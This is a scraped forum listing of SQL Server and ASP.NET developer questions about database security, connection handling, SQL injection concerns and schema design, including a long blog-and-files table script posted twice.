Protecting Database From Code Stealing And Installer Advice
Aug 24, 2005
Dear Group
I'd be grateful if you can give me some advice on the following.
An application I wrote uses an MSDE backend and I wonder whether
there's a way (even for the system administrator) of not seeing or
tracing stored procedure code, view and table designs?
And I also wonder whether you can advise me on an installer that
handles MSDE and database setup during installation without too much
effort but is still affordable < USD 1000.
Any articles, resources, advice hints for these two topics are very
appreciated.
Thank you very much for your help & efforts!
Martin
View 3 Replies
ADVERTISEMENT
Jul 23, 2006
I have a database installed on my server, and i have put a database on user "sa" , so when any user wants to view the database he must enter the password to view its content. But i have dicover that if the user make the authentication "Windows Authentication" and opened the database it will be opned without the need to enter the password !!! and for this i cant restrict the access for my database from un-authorized people.
Can any one tell me how i can restrict view database content unless entering the password?
Thaks
View 2 Replies
View Related
Jul 20, 2005
Hidoes anyone know of a way of giving developers read only access to adatabase diagram in Enterprise Manager (SQL Server 2000). The database wassupplied by a third party and we don't want them tinkering with it, butthey do need to be able to create additional tables etc. to extend thefunctionality of the package.TIAChloe Crowder
View 2 Replies
View Related
Aug 26, 2006
I have a Windows Forms 2.0 application with which I am distributing a SQL Express database. I am currently using User Instances. Due to HIPAA requirements, I need to prevent any consumers from accessing the data within the database. Only the application should be able to expose the data. Ideally, I would like to hard code credentials into the compiled code to do this. How can I accomplish this ?
View 1 Replies
View Related
Dec 4, 2006
Hello,I need a procedure to return the value of field [ContentHtml] given values for [ContentName] and [ContentCulture].In theory only one record will be found so only one [ContentHtml] value will be returned.If multiple records are found I want to return "#MultipleFound#".If no record is found I want to return "#NotFound#".In my .NET code I am executing a ExecuteScalar: Dim Html As String = CType(command.ExecuteScalar, String)I believe I should use @@ROWCOUNT to do this.Could somebody explain to me how to integrate @@ROWCOUNT in my procedure code to achieve what I described?And should I do it this way or there is a better solution?My Procedure is as follows: -- Define the procedure parameters @ContentName NVARCHAR(100), @ContentCulture NVARCHAR(5)AS-- Allows @@ROWCOUNT and the return of number of records when ExecuteNonQuery is usedSET NOCOUNT OFF;-- Declare and define ContentIdDECLARE @ContentId UNIQUEIDENTIFIER;SELECT @ContentId = ContentId FROM dbo.by27_Content WHERE ContentName = @ContentName-- Check if ContentId is Not NullIF @ContentId IS NOT NULL BEGIN -- Select localized content from by27_ContentLocalized SELECT dbo.by27_ContentLocalized.ContentHtml FROM dbo.by27_Content INNER JOIN dbo.by27_ContentLocalized ON dbo.by27_Content.ContentId = dbo.by27_ContentLocalized.ContentId WHERE (dbo.by27_ContentLocalized.ContentCulture = @ContentCulture AND dbo.by27_Content.ContentName = @ContentName); ENDThanks,Miguel
View 1 Replies
View Related
Jan 5, 2007
I need some advice on a project that I am working on...
First, here is what I am trying to achieve: A Web Form with two controls: A DropDownList with two items added at design time (Fruits and Vegetables) and an empty ListBox. When the user chooses a "category" from the DropDownList, the ListBox will be populated with a list of either "Fruits" or "Vegetables" retrieved from a SQL database. (Note: Since the data in the SQL database must be converted and formatted programatically, simply databinding the ListBox will not work here.)
I believe that I can do this with the following code (stolen from an MSDN article):'Create ADO.NET objects.
Private myConn As SqlConnection
Private myCmd As SqlCommand
Private myReader As SqlDataReader
Private results As String
'Create a Connection object.
myConn = New SqlConnection("Initial Catalog=Northwind;" & _
"Data Source=localhost;Integrated Security=SSPI;")
'Create a Command object.
myCmd = myConn.CreateCommand
myCmd.CommandText = "SELECT FirstName, LastName FROM Employees"
'Open the connection.
myConn.Open()
myReader = myCmd.ExecuteReader()
'Concatenate the query result into a string.
Do While myReader.Read()
results = results & myReader.GetString(0) & vbTab & _
myReader.GetString(1) & vbLf
Loop
'Display results.
MsgBox(results)
'Close the reader and the database connection.
myReader.Close()
myConn.Close()
Now here is the part that I am not sure about: Is the FormLoad event the best place to put this code? If I do, is this not a lot of overhead (creating, opening and closing a connection) everytime there is a page refresh/PostBack? Would I be better off putting this code in the DropDownList SelectedIndexChanged event? Although that seems like it could make the process of selecting a category take a fairly long time.
Finally, if the is a better way of doing this, I am certainly open to suggestions.
All advice is greatly appreciated.
View 1 Replies
View Related
Jul 20, 2005
My new employer is CMM Level 3. As part of the CMM/Personal SoftwareProcess, I am required to create pseudo code for my stored procedureand UDF design. Has anyone done this? If so, can anyone give me someadvice?
View 1 Replies
View Related
Feb 26, 2006
Hi,
I have an application which is similar to the following example
Private Sub Start()For a as int16 = 1 to 300lstResults.items.add(GetPriceFromItem(a))NextEnd Sub
Private Function GetPriceFromItem(byval item as int16) as String'Connect to SQL'Execute "SELECT Price FROM Table WHERE Item='" & item.tostring & "'"'Close Database connection'Return PriceEnd Function
I want to know if there is a more efficeint way of doing this, i.e. i'm concerned that the routine creates 300 SqlConnection instances, 300 open/closes and 300 queries
Would a better way be to connect to SQL once, get the entire table then do the 300 "lookups" locally somehow, perhaps put it all into a DataTable, but can you query a datatable in this way, or could you suggest another control.
Best Regards
Ben
View 7 Replies
View Related
Aug 2, 2004
Hi,
I'm about to embark on writing some code in perl or VBscript that automatically synchronises a constantly updated Access database with an MSSQL database.
I know MSSQL has an import tool built into Enterprise manager but I'm wondering if theres a stored procedure that does this?
The way I'm thinking of doing it is to read the all the access tables into separate hash arrays and then INSERTing them into the MSSQL database after checking for any duplicates. This all sounds a bit time consuming (there are a large number of tables) and processor intensive.
If anyones done anything like this before, I'd love to hear their views......!
Thanks!
View 9 Replies
View Related
Nov 26, 2007
I have created a Web Setup Project for my web application which also contains a database. Currently I am having troubles scripting the database and run it during my Custom Action for the setup project.
I used the publishing wizard to create a sql script that contains both the schema and the data for the database. However when I run the script using
Code Block
SqlCommannd.ExecuteNonQuery();
it fails. I believe this is because the ExecuteNonQuery method does support SQL statements like GO etc that are part of the SQL Script. So I now believe my approach is wrong. So my question is how should I script my database (both schema and data) and run this script during the Custom Action of my setup?
View 3 Replies
View Related
Dec 8, 2007
Hi,I recently contacted my hosting company's customer support about my databases not working - saying that I use sql express (which they support).The guy recommended:
"I would suggest you to upgrade the db's to use mssql 2005." "This
is because, sql express is built for development environment. When you
are in development environment, you are accessing everything with
administrator permission. However, in live hosting environment (when
there are differnet kind of permission restrictions), sql express often
failed on attaching database." Does anyone have any opinion on that? Would it be best to change db's to use mssql 2005? How complicated/time consuming will it be to upgrade?Thanks!Jon
View 1 Replies
View Related
Jun 4, 2007
I am thinking of doing a fake PC company site for my ASP project. so
what they will have is a chat, products with reviews, and users can
have "Buddies".So my DB so far (Tables):ProductPC - ID, Processor, RAM, HDD, Graphics, LCD ...ProductHardware
- ID, Title (Like "Intel C2D E6600"), Description, Price, Rating (0-5
stars, so integer), Category (CPU, HDD, Graphics)ProductSoftware - ID, Title (eg. "Adobe CS3"), Description, Price, Rating, Category (eg. Design, Programming)Reviews - ID, ProductID, Title, Content, DateChat - ID, TopicID, Title, Content, DateUsers - ID, Username, Password,The problem, how do i connect Reviews to the products since they are from diff tables.How do i get the "buddy" system workingChat i think its not as simple as thatBut i just need a simple ASP project, so no need to get too complex, but i still hope to learn as much.
View 12 Replies
View Related
Jun 17, 2007
Hi,Apologies if this has already been asked, but I couldnt find a thread that asked exactly what I wanted.Im making an administration panel for a site where you can change various settings, options, and categories that data can fall into. When editing, adding or deleting a record i COULD make a trip to the database every time, but this feels very inefficient as I understand that establishing the connection is usually the biggest performance hit when querying a database.An alternative plan is for me to simply record the changes made in the panel and have a "save" button. When this is clicked, ONE database connection would be opened and all the data would be saved/updated/deleted as necessary. However, this would involve several "for" loops while the connection is open.The question is; which method would you recommend and why? And does having several "for" loops while the connection is open nullify the advantage gained by only opening one connection?Any advice would be very much appreciated. Thank you
View 2 Replies
View Related
Dec 16, 2005
Hello,I am working on a web site which will use SQL 2005.I am planing my first SQL database and I am looking for advice.1. There will be two types of users: students and professors.2. Both users types will have login information. (Username, Password, AccessLevel) 3. The remaining information on students and professores is different. Student (Name, Email, Phone, ...) / Professor (Name, Email, Phone, Subjects, ...)4. Professors can publish documents. Each document has some info (Type, Title, Description, ...)My plan in this moment is to:A. Create the tables Students, Professors, Login and Documents.B. Students table would be connected to Login table. Professors table would be connected to Login table and Documents table.C. The field [Type] in documents table should include the type or should I create a table DocumentsTypes where I add codes for each type. I have seen this. What is the advantage?Can someone give me some advice?Thank you Very Much,Miguel
View 1 Replies
View Related
Oct 19, 2007
Hello,
I am creating a database where:
- I have a Blogs and Folders system.
- Use a common design so I can implement new systems in the future.
Users, Comments, Ratings, View, Tags and Categories are tables common to all systems, i.e., used by Posts and Files in Blogs and Folders.
- One Tag or Category can be associated to many Posts or Files.
- One Comment, View or Rating should be only associated to one Post or one File. I am missing this ... (1)
Relations between a File / Folder and Comments / Ratings / View / Tags / Categories are done using FilesRatings, FoldersViews, etc.
I am using UniqueIdentifier as Primary Keys.
I checked ASP.NET Membership tables, a few articles and few features in my project, such as renaming files with the GUID of their records.
I didn't decided yet for INT or UNIQUEIDENTIFIER.
I am looking for some feedback on the design of my database.
One thing I need to improve is mentioned in (1)
Thank You,
Miguel
My Database Script:
-- Users ...
create table dbo.Users
(
UserID uniqueidentifier not null
constraint PK_User primary key clustered,
[Name] nvarchar(200) not null,
Email nvarchar(200) null,
UpdatedDate datetime not null
)
-- Categories ...
create table dbo.Categories
(
CategoryID uniqueidentifier not null
constraint PK_Category primary key clustered,
[Name] nvarchar(100) not null
)
-- Comments ...
create table dbo.Comments
(
CommentID uniqueidentifier not null
constraint PK_Comment primary key clustered,
AuthorID uniqueidentifier not null,
Title nvarchar(400) null,
Body nvarchar(max) null,
UpdatedDate datetime not null,
constraint FK_Comments_Users
foreign key(AuthorID)
references dbo.Users(UserID)
)
-- Ratings ...
create table dbo.Ratings
(
RatingID uniqueidentifier not null
constraint PK_Rating primary key clustered,
AuthorID uniqueidentifier not null,
Value float not null,
constraint FK_Ratings_Users
foreign key(AuthorID)
references dbo.Users(UserID)
)
-- Tags ...
create table dbo.Tags
(
TagID uniqueidentifier not null
constraint PK_Tag primary key clustered,
[Name] nvarchar(100) not null
)
-- Views ...
create table dbo.Views
(
ViewID uniqueidentifier not null
constraint PK_View primary key clustered,
Ticket [datetime] not null
)
-- Blogs ...
create table dbo.Blogs
(
BlogID uniqueidentifier not null
constraint PK_Blog primary key clustered,
Title nvarchar(400) null,
Description nvarchar(2000) null,
CreatedDate datetime null
)
-- Posts ...
create table dbo.Posts
(
PostID uniqueidentifier not null
constraint PK_Post primary key clustered,
BlogID uniqueidentifier not null,
AuthorID uniqueidentifier not null,
Title nchar(1000) null,
Body nvarchar(max) null,
UpdatedDate datetime not null,
IsPublished bit not null,
constraint FK_Posts_Blogs
foreign key(BlogID)
references dbo.Blogs(BlogID)
on delete cascade,
constraint FK_Posts_Users
foreign key(AuthorID)
references dbo.Users(UserID)
on delete cascade
)
-- PostsCategories ...
create table dbo.PostsCategories
(
PostID uniqueidentifier not null,
CategoryID uniqueidentifier not null,
constraint PK_PostsCategories
primary key clustered (PostID, CategoryID),
constraint FK_PostsCategories_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsCategories_Categories
foreign key(CategoryID)
references dbo.Categories(CategoryID)
)
-- PostsComments ...
create table dbo.PostsComments
(
PostID uniqueidentifier not null,
CommentID uniqueidentifier not null,
constraint PK_PostsComments
primary key clustered (PostID, CommentID),
constraint FK_PostsComments_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsComments_Comments
foreign key(CommentID)
references dbo.Comments(CommentID)
on delete cascade
)
-- PostsRatings ...
create table dbo.PostsRatings
(
PostID uniqueidentifier not null,
RatingID uniqueidentifier not null,
constraint PK_PostsRatings
primary key clustered (PostID, RatingID),
constraint FK_PostsRatings_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsRatings_Ratings
foreign key(RatingID)
references dbo.Ratings(RatingID)
on delete cascade
)
-- PostsTags ...
create table dbo.PostsTags
(
PostID uniqueidentifier not null,
TagID uniqueidentifier not null,
constraint PK_PostsTags
primary key clustered (PostID, TagID),
constraint FK_PostsTags_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsTags_Tags
foreign key(TagID)
references dbo.Tags(TagID)
)
-- PostsViews ...
create table dbo.PostsViews
(
PostID uniqueidentifier not null,
ViewID uniqueidentifier not null,
constraint PK_PostsViews
primary key clustered (PostID, ViewID),
constraint FK_PostsViews_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsViews_Views
foreign key(ViewID)
references dbo.Views(ViewID)
on delete cascade
)
-- Folders ...
create table dbo.Folders
(
FolderID uniqueidentifier not null
constraint PK_Folder primary key clustered,
[Name] nvarchar(100) null,
Description nvarchar(2000) null,
CreatedDate datetime not null,
URL nvarchar(400) not null
)
-- Files ...
create table dbo.Files
(
FileID uniqueidentifier not null
constraint PK_File primary key clustered,
FolderID uniqueidentifier not null,
AuthorID uniqueidentifier not null,
Title nvarchar(400) null,
Description nvarchar(2000) null,
[Name] nvarchar(100) not null,
URL nvarchar(400) not null,
UpdatedDate datetime not null,
IsPublished bit not null,
Type nvarchar(50) null,
constraint FK_Files_Folders
foreign key(FolderID)
references dbo.Folders(FolderID)
on delete cascade,
constraint FK_Files_Users
foreign key(AuthorID)
references dbo.Users(UserID)
on delete cascade
)
-- FilesCategories ...
create table dbo.FilesCategories
(
FileID uniqueidentifier not null,
CategoryID uniqueidentifier not null,
constraint PK_FilesCategories
primary key clustered (FileID, CategoryID),
constraint FK_FilesCategories_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesCategories_Categories
foreign key(CategoryID)
references dbo.Categories(CategoryID)
)
-- FilesComments ...
create table dbo.FilesComments
(
FileID uniqueidentifier not null,
CommentID uniqueidentifier not null,
constraint PK_FilesComments
primary key clustered (FileID, CommentID),
constraint FK_FilesComments_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesComments_Comments
foreign key(CommentID)
references dbo.Comments(CommentID)
on delete cascade
)
-- FilesRatings ...
create table dbo.FilesRatings
(
FileID uniqueidentifier not null,
RatingID uniqueidentifier not null,
constraint PK_FilesRatings
primary key clustered (FileID, RatingID),
constraint FK_FilesRatings_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesRatings_Ratings
foreign key(RatingID)
references dbo.Ratings(RatingID)
on delete cascade
)
-- FilesTags ...
create table dbo.FilesTags
(
FileID uniqueidentifier not null,
TagID uniqueidentifier not null,
constraint PK_FilesTags
primary key clustered (FileID, TagID),
constraint FK_FilesTags_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesTags_Tags
foreign key(TagID)
references dbo.Tags(TagID)
)
-- FilesViews ...
create table dbo.FilesViews
(
FileID uniqueidentifier not null,
ViewID uniqueidentifier not null,
constraint PK_FilesViews
primary key clustered (FileID, ViewID),
constraint FK_FilesViews_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesViews_Views
foreign key(ViewID)
references dbo.Views(ViewID)
on delete cascade
)
-- Run script
go
View 2 Replies
View Related
Feb 13, 2008
I'm at a new installation where there's no DBA at all, so, as a Coldfusion programmer, I'm now the DBA, LOL.
The main SQL2000 DB we use is approximately 100MB with about 7MB of free space and is allocated to expand by 10%.
I am adding a new, large table, about 60 columns with lots of variable-length unicode fields, mostly nvarchar. It's being used to track non-USA user-form information. Even though the DB is set to expand, I'm concerned that due to the potential size/volume of records, that the auto-expand could cause performance issues.
The SQL2000 server has plenty of room, about 49GB, so I'm wondering if I should expand the size of the current DB, or if the auto-expand feature will be ok.
At this point I'm not sure what the volume of the user-form records will be in the new table. It won't be a million records certainly, but I'm guessing it could climb to maybe 10-20,000 records.
If I should expand the DB, can I do this while the DB is still online?
thanks...
View 4 Replies
View Related
Jul 20, 2005
hi folks,i'm puzzled over this one, anyone with some solid db experience might beable to enlighten me here.i'm modelling a file system in a database as follows, and i can't figure outto cleanly implement an inheritance mechanism.i have a hierarchy of folders in an sql table. every folder has aparentFolderID, if this value is 0 then it means it's a root folder.then, in a 'files' table, every file has a parentFolderID to give it alocation in the structure. fairly basic.the hard part is that each file record has an attribute 'STYLE' that can beexplicitly specified, or inherited from it's parent folder, or it's parentsparent folder, or.. all the way back to the root.the 2 ways i've come up with representing it are:1) if the style is being inherited, enter a null value in the STYLE field.then to figure out what style applies to a file or folder, i trace backthrough it's parentFolderID records until i find a style attribute that isnot null.the good thing about this is that if i change the style that is applied tothe entire filesystem, it only takes one update.the bad thing is when i want to figure out what style applies to a file, ihave to traverse back through possibly several records to locate the folderthat actually specifies the style being inherited by the file.2) explicitly state all style values in each record.this is good for accessing the style of a file or folder because you get itstraight out first time from the db.the bad thing is if i update the entire file system, i might have severalhundred / thousand update sql statements to execute to update all the valuesin every folder and every file. nasty!thanks for any help, i'm really stumped with this and i'm thinking theremust be a more elegant way to implement inheritance.thankstim
View 2 Replies
View Related
May 1, 2006
Hi,
I.m trying to find the best practice for my solution.
This is the situation.
My application has two databases and 2 client interface. One with a windows forms having a database (sql server 2000) running in an office (on a static IP but on a slow connection). the second one is an web application running on the net with an online database. Both these databases have to have same information. Users can add records to both databases independently but these databases should be synchronize at a point. I hope the situation is cleare. Is there a standard way of doing this. If some one knows good article of how this can be done pls forward it to me.
Many thanks.
-VJ
View 11 Replies
View Related
Oct 21, 2007
Hello,
I am creating a database where:
- I have a Blogs and Folders system.
- Use a common design so I can implement new systems in the future.
Users, Comments, Ratings, View, Tags and Categories are tables common to all systems, i.e., used by Posts and Files in Blogs and Folders.
- One Tag or Category can be associated to many Posts or Files.
- One Comment, View or Rating should be only associated to one Post or one File. I am missing this ... (1)
Relations between a File / Folder and Comments / Ratings / View / Tags / Categories are done using FilesRatings, FoldersViews, etc.
I am using UniqueIdentifier as Primary Keys.
I checked ASP.NET Membership tables, a few articles and few features in my project, such as renaming files with the GUID of their records.
I didn't decided yet for INT or UNIQUEIDENTIFIER
I am looking for some feedback on the design of my database.
One thing I think need to improve is mentioned in (1)
But any advices to improve it would be great.
Thank You,
Miguel
My Database Script:
-- Users ...
create table dbo.Users
(
UserID uniqueidentifier not null
constraint PK_User primary key clustered,
[Name] nvarchar(200) not null,
Email nvarchar(200) null,
UpdatedDate datetime not null
)
-- Categories ...
create table dbo.Categories
(
CategoryID uniqueidentifier not null
constraint PK_Category primary key clustered,
[Name] nvarchar(100) not null
)
-- Comments ...
create table dbo.Comments
(
CommentID uniqueidentifier not null
constraint PK_Comment primary key clustered,
AuthorID uniqueidentifier not null,
Title nvarchar(400) null,
Body nvarchar(max) null,
UpdatedDate datetime not null,
constraint FK_Comments_Users
foreign key(AuthorID)
references dbo.Users(UserID)
)
-- Ratings ...
create table dbo.Ratings
(
RatingID uniqueidentifier not null
constraint PK_Rating primary key clustered,
AuthorID uniqueidentifier not null,
Value float not null,
constraint FK_Ratings_Users
foreign key(AuthorID)
references dbo.Users(UserID)
)
-- Tags ...
create table dbo.Tags
(
TagID uniqueidentifier not null
constraint PK_Tag primary key clustered,
[Name] nvarchar(100) not null
)
-- Views ...
create table dbo.Views
(
ViewID uniqueidentifier not null
constraint PK_View primary key clustered,
Ticket [datetime] not null
)
-- Blogs ...
create table dbo.Blogs
(
BlogID uniqueidentifier not null
constraint PK_Blog primary key clustered,
Title nvarchar(400) null,
Description nvarchar(2000) null,
CreatedDate datetime null
)
-- Posts ...
create table dbo.Posts
(
PostID uniqueidentifier not null
constraint PK_Post primary key clustered,
BlogID uniqueidentifier not null,
AuthorID uniqueidentifier not null,
Title nchar(1000) null,
Body nvarchar(max) null,
UpdatedDate datetime not null,
IsPublished bit not null,
constraint FK_Posts_Blogs
foreign key(BlogID)
references dbo.Blogs(BlogID)
on delete cascade,
constraint FK_Posts_Users
foreign key(AuthorID)
references dbo.Users(UserID)
on delete cascade
)
-- PostsCategories ...
create table dbo.PostsCategories
(
PostID uniqueidentifier not null,
CategoryID uniqueidentifier not null,
constraint PK_PostsCategories
primary key clustered (PostID, CategoryID),
constraint FK_PostsCategories_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsCategories_Categories
foreign key(CategoryID)
references dbo.Categories(CategoryID)
)
-- PostsComments ...
create table dbo.PostsComments
(
PostID uniqueidentifier not null,
CommentID uniqueidentifier not null,
constraint PK_PostsComments
primary key clustered (PostID, CommentID),
constraint FK_PostsComments_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsComments_Comments
foreign key(CommentID)
references dbo.Comments(CommentID)
on delete cascade
)
-- PostsRatings ...
create table dbo.PostsRatings
(
PostID uniqueidentifier not null,
RatingID uniqueidentifier not null,
constraint PK_PostsRatings
primary key clustered (PostID, RatingID),
constraint FK_PostsRatings_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsRatings_Ratings
foreign key(RatingID)
references dbo.Ratings(RatingID)
on delete cascade
)
-- PostsTags ...
create table dbo.PostsTags
(
PostID uniqueidentifier not null,
TagID uniqueidentifier not null,
constraint PK_PostsTags
primary key clustered (PostID, TagID),
constraint FK_PostsTags_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsTags_Tags
foreign key(TagID)
references dbo.Tags(TagID)
)
-- PostsViews ...
create table dbo.PostsViews
(
PostID uniqueidentifier not null,
ViewID uniqueidentifier not null,
constraint PK_PostsViews
primary key clustered (PostID, ViewID),
constraint FK_PostsViews_Posts
foreign key(PostID)
references dbo.Posts(PostID)
on delete cascade,
constraint FK_PostsViews_Views
foreign key(ViewID)
references dbo.Views(ViewID)
on delete cascade
)
-- Folders ...
create table dbo.Folders
(
FolderID uniqueidentifier not null
constraint PK_Folder primary key clustered,
[Name] nvarchar(100) null,
Description nvarchar(2000) null,
CreatedDate datetime not null,
URL nvarchar(400) not null
)
-- Files ...
create table dbo.Files
(
FileID uniqueidentifier not null
constraint PK_File primary key clustered,
FolderID uniqueidentifier not null,
AuthorID uniqueidentifier not null,
Title nvarchar(400) null,
Description nvarchar(2000) null,
[Name] nvarchar(100) not null,
URL nvarchar(400) not null,
UpdatedDate datetime not null,
IsPublished bit not null,
Type nvarchar(50) null,
constraint FK_Files_Folders
foreign key(FolderID)
references dbo.Folders(FolderID)
on delete cascade,
constraint FK_Files_Users
foreign key(AuthorID)
references dbo.Users(UserID)
on delete cascade
)
-- FilesCategories ...
create table dbo.FilesCategories
(
FileID uniqueidentifier not null,
CategoryID uniqueidentifier not null,
constraint PK_FilesCategories
primary key clustered (FileID, CategoryID),
constraint FK_FilesCategories_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesCategories_Categories
foreign key(CategoryID)
references dbo.Categories(CategoryID)
)
-- FilesComments ...
create table dbo.FilesComments
(
FileID uniqueidentifier not null,
CommentID uniqueidentifier not null,
constraint PK_FilesComments
primary key clustered (FileID, CommentID),
constraint FK_FilesComments_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesComments_Comments
foreign key(CommentID)
references dbo.Comments(CommentID)
on delete cascade
)
-- FilesRatings ...
create table dbo.FilesRatings
(
FileID uniqueidentifier not null,
RatingID uniqueidentifier not null,
constraint PK_FilesRatings
primary key clustered (FileID, RatingID),
constraint FK_FilesRatings_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesRatings_Ratings
foreign key(RatingID)
references dbo.Ratings(RatingID)
on delete cascade
)
-- FilesTags ...
create table dbo.FilesTags
(
FileID uniqueidentifier not null,
TagID uniqueidentifier not null,
constraint PK_FilesTags
primary key clustered (FileID, TagID),
constraint FK_FilesTags_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesTags_Tags
foreign key(TagID)
references dbo.Tags(TagID)
)
-- FilesViews ...
create table dbo.FilesViews
(
FileID uniqueidentifier not null,
ViewID uniqueidentifier not null,
constraint PK_FilesViews
primary key clustered (FileID, ViewID),
constraint FK_FilesViews_Files
foreign key(FileID)
references dbo.Files(FileID)
on delete cascade,
constraint FK_FilesViews_Views
foreign key(ViewID)
references dbo.Views(ViewID)
on delete cascade
)
-- Run script
go
View 2 Replies
View Related
Feb 27, 2008
hi,
iam thinking of changing my ajax slideshow so that it gets the data from the databse. currently i am finding it hard to add text functianlity the way i want with the slide show.
what my query is, that if i to using a datalist can i add javasscript functionality to the data being retrived. for example, currently i have written some javascript so that a series of text is diplayed one after the other in a sequence from just one button click. so if im pulling data out of a databse can i still add this javascript functionality to it? i hope this makes sense, if it doesnt then i am willing to elaborate. please can any one offer any advice or examples or any suggestions on how i can do this. any help is much appricated as i am struggling to find a solution as i orinally wanted to be able to add this javascript functionality with the play button of the slide show but i couldnt find a solution.also i think its better to use some kind of database as i can use the editing funtions visual web developer offers
thank you
View 2 Replies
View Related
Mar 13, 2008
Hi All Professionals Programmers,
I would like to ask a question that is very important for me. The question is how can i create a flexible data base in which i m able to create the inner levels as much as i can.
Like i have a table building, then i have another child table floor, then the floor become parent and i have its child rooms, then the rooms become parent and i have its child floor tiles etc.
you can see i am going to inner dept, so i need a flexible database because its very costly and intimadting to change the database and every time create a new table and relationships.
Hope you have understood what i am going to say and need advice of professional and expert user to resolve it.
Any concise quality material like articles, white paper etc will also be suitable for me.
Thanks in Advance
View 3 Replies
View Related
May 22, 2008
Greetings,
Have an interesting issue in a database I'm trying to design and I'm trying to find a better way to setup the structure, if there is one. Going to generic example of my issue.
StudentList --- This table is the list of all College Students(with Primary Key of StudentID)
MajorsList --- This is a table listing all of the majors available at the College (PK of MajorID)
CourseList --- This is the list of all of the courses at the school (PK of ClassID)
This college allows students to take 1 or more majors, with the number of majors unknown.
-- Any number of students can take the same majors or different majors.
-- -- (aka 1 StudentID -> 1+ Majors & 1 Major -> 1+ StudentID's)
The majors all have different numbers of courses in them.
-- Many of the majors can have the same, or different courses in their lists.
-- -- (aka 1 Major -> 1+ Courses & 1 Course -> 1+ Majors)
I'm looking to see if their is a better way of tieing together the Students -> Majors and Majors -> Courses.
If done properlly, a single select and a few joins should bring up every class a student is taking for all their majors, or any other relationship to any of the three main tables primary keys.
Currently, to tie the three tables together, I have made two Interrum tables:
-- StudentMajors - - With only two columns
-- -- StudentID (ForeignKey tied to PrimaryKey StudentID in StudentList)
-- -- MajorID (FK tied to PrimaryKey MajorID in MajorList)
and
-- MajorCourses - - with only two columns
-- -- MajorID (FK tied to PrimaryKey MajorID in MajorList)
-- -- CourseID (FK tied to PrimaryKey CourseID in CourseList)
These tables give clear and definate ties between the tables, but my worry is that there is no primary key for these two tables, and no column in the tables is elledgeable for becoming PK, because, in this example the StudentMajors table can lis tthe studentID multiple times, each with a different MajorID. Sames goes with MajorCourses.
Is there a better structure method for reaching this same goal?
Additional, I don't know how to do a contraint that should be in place of:
-- In StudentMajors, for each value of studentID, there can be no duplicate values on MajorID
-- -- (same in MajorCourses tables in relations to classid's)
Any advice on how to do this constraint?
View 3 Replies
View Related
Jun 2, 2008
Hello,
I have an asp.net application which connects to SQL Server 2005 database.
One out of 15 times (approx) the applicaiton does not make connection to the database and an exception is thrown.
I am not sure how to debug this. Should I write some code which can make connections in a loop to test how much stress the sever can handle?
Kindly suggest some ideas. Thanks.
View 3 Replies
View Related
Jul 3, 2007
Hello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
View 3 Replies
View Related
Dec 24, 2004
I have a VB6 program that is using MS-SQL Server 2000. The people using the program can access the database and modify the records. This is fine except for one table.
Is it possible to prevent users from modifying one table (they can still view it) and allowing me and the VB program to acces this table?
View 2 Replies
View Related
Feb 22, 2001
I am currently writing a VB app based around a SQLserver2000 database. I have used stored procedures wherever possible to select/update/delete data. I am planning to distribute this app and wonder whether there are any tricks out there for encrypting/setting security so that even the SA account would be unable to read my stored procedures, but obviously be able to execute them?
There are two scenarios - one is where I want to let someone borrow a laptop just for a few days for a demo. Presumably I just give them an unprivileged user account without interactive logon possibilities, by which I mean Enterprise Manager and the other SQLserver Client tools [can I do this?] and control all access from the app.
The other scenario is when the app is purchased and I no longer have control of the SQL Server nor the SA account.
Any pointers would certainly be very useful indeed. Thanks.
View 1 Replies
View Related
Mar 20, 2007
Andy writes "Good day Gurus!
I have a question regarding how to protect my SQL data. My Material Resource Planning software is built on SQL. There is a problem with my data and possibly a bug in the vendors software. They are asking me to send them my database.
My database contains vendors, customers, pricing partlists and procedures. The advantage of an MRP/ERP system is that the data is all in one place; the disadvantage is that if I send it out to the vendor, they have access to all that I do. This vendor also supports some of my competitors. My concern is that all it would take is one vendor employee to jump ship with my data on a dongle and I could end up completely compromised as a company.
Is there a way of easily or is there software that can leave the significant data in tact but replace the confidential data with meaningless information?
Significant data would be numbers, costs, etc, or data that I choose. Confidential data would be vendors, customers, etc.
It seems to me that this would be a fairly common problem, but I cannot find a solution that is both quick and effective.
Thanks for your collective thoughts.
Andy,"
View 3 Replies
View Related
Mar 6, 2008
